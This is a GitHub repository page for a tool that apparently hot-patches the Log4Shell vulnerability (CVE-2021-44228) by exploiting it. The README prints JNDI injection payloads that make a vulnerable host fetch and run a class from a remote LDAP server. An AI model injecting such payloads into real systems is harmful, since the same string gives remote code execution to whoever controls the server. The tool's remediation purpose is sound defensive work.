Skip to content

qingtengyun/cve-2021-44228-qingteng-online-patch

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 6 tags
Code

Latest commit

@rwxxwr
rwxxwr Update README.md
22624e6 Jan 19, 2022
Update README.md
22624e6

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
gradle/wrapper
 
 
src/main/java
 
 
.gitignore
 
 
LICENSE
 
 
README.md
 
 
build.gradle
 
 
gradlew
 
 
gradlew.bat
 
 
settings.gradle
 
 
cve-2021-44228-qingteng-online-patch What is this How to use Run your own server Build

README.md

cve-2021-44228-qingteng-online-patch

What is this

Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.

How to use

Inject the following code to anywhere likely vulnerable to CVE-2021-44228,

${jndi:ldap://your-own-server/patch}

To prevent MITM attack during the patch process, the following payload is recommended, but with less compatibility for older versions of Java,

${jndi:ldap://your-own-server/any_string_except_patch}

Run your own server

  1. Download the latest releases

  2. Specify system environment variables LOG4J_HOTFIX_HTTP_PATH and LOG4J_HOTFIX_HTTPS_PATH if you want to host Hotfix.class on your own server

Build

Please note Hotfix.java should be compiled with JDK6 for maximum compatibility.

About

Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.

Topics

log4j log4jshell

Resources

Readme

License

Apache-2.0 license

Stars

26 stars

Watchers

1 watching

Forks

4 forks

Releases 2

v1.5 Latest
Dec 18, 2021
+ 1 release

Packages

No packages published

Languages